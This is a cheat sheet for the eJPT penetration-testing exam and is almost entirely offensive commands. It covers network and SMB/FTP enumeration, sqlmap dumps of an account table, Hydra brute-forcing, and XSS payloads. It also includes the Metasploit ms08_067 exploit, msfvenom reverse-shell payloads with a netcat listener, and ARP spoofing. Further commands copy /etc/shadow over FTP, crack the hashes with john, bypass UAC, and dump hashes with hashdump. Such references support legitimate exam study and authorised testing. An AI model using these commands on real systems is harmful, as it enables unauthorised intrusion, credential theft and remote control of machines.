eJPT
This is a cheat sheet for the eJPT exam.
👶 Prerequisites
- Introduction
- Networking
- Web Applications
- Penetration Testing
Nmap
nmap -sn 10.10.10.0/24
nmap -sV -A 10.10.10.0
nmap -A -sV -n -v -Pn -p- -T4 --open -iL hosts.txt
fping
fping -a -g 10.10.10.0/24 2>/dev/null
IP Route
Syntax: ip route add <Network-range> via <router-IP> dev <interface>
e.g. ip route add 10.10.10.0/24 via 10.10.11.1 dev tap0
John
unshadow passwd.txt shadow.txt > passwords.txt
john passwords.txt
john --show passwords.txt
dirb
dirb http://10.10.10.101:8080/
I suggest using dirbuster for better speed. Keep the threads at 20 and use the /usr/share/wordlists/dirb/common.txt wordlist.
Netcat
Listen for a reverse shell:
nc -nvlp 1234
SQLMap
sqlmap -u "http://10.10.10.7/Abc.php?id=2" --dbs
sqlmap -u "http://10.10.10.7/Abc.php?id=2" -D Xyz --tables
sqlmap -u "http://10.10.10.7/Abc.php?id=2" -D Xyz -T accounts --columns
sqlmap -u "http://10.10.10.7/Abc.php?id=2" -D Xyz -T accounts -C iban --dump
sqlmap -u "http://10.10.10.7/Abc.php?id=2" -D Xyz -T accounts --dump
sqlmap -r postrequest.txt
sqlmap -r post.txt --dump-all
Hydra
hydra -v -V -u -L userlist -P passwordslist -t 1 10.10.10.14 ftp
hydra -v -V -u -L userlist -P passwordslist -t 1 10.10.10.14 ssh
XSS
<script>alert(1)</script>
<ScRiPt>alert(1)</ScRiPt>
"><script>alert(1)</script>
This is a great filter bypass cheat-sheet: https://owasp.org/www-community/xss-filter-evasion-cheatsheet
Metasploit msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show targets
...targets...
msf exploit(ms08_067_netapi) > set TARGET <target-id>
msf exploit(ms08_067_netapi) > show options
...show and set options...
msf exploit(ms08_067_netapi) > exploit
msfvenom shells
JSP Java Meterpreter Reverse TCP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<local-ip> LPORT=<local-port> -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<local-ip> LPORT=<local-port> -f war > shell.war
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<local-ip> LPORT=<local-port> -f raw > shell.php
Prepend the opening PHP tag to the generated file (pbcopy and pbpaste are macOS tools):
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
Metasploit Meterpreter autoroute
run autoroute -s 10.10.10.0/24
ARPSpoof
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i <interface> -t <target-IP> -r <host-IP>
arpspoof -i tap0 -t 10.100.13.37 -r 10.100.13.36
SMB Enumeration
Get shares, users, groups, password policy
smbclient -L //10.10.10.10/
enum4linux -U -M -S -P -G 10.10.10.10
enum4linux -a 10.10.10.212
nmap --script=smb-enum-users,smb-os-discovery,smb-enum-shares,smb-enum-groups,smb-enum-domains 10.10.10.10 -p 135,139,445 -v
nmap -p445 --script=smb-vuln-* 10.10.10.10 -v
Access Share
smbclient //10.10.10.10/share_name
FTP Enumeration
nmap --script=ftp-anon 10.10.10.10 -p21 -v
nmap -A -p21 10.10.10.10 -v
Log in to the FTP server
ftp 10.10.10.10
SITE CPFR /etc/passwd
SITE CPTO /tmp/pass.txt
get /etc/passwd
SITE CPFR /etc/shadow
SITE CPTO /tmp/shadow.txt
get /etc/shadow
Meterpreter
- ps
- getuid
- getpid
- getsystem
- ps -U SYSTEM
CHECK UAC/Privileges
run post/windows/gather/win_privs
BYPASS UAC
Background the session first (background), then:
use exploit/windows/local/bypassuac
set SESSION <session-id>
After PrivEsc
migrate <pid>
hashdump
Windows Command Line
To search for a file starting from the current directory:
dir /b/s "*.conf*"
dir /b/s "*.txt*"
dir /b/s "*filename*"
Check routing table
route print
netstat -r
Check Users
net users
List drives on the machine
wmic logicaldisk get Caption,Description,providername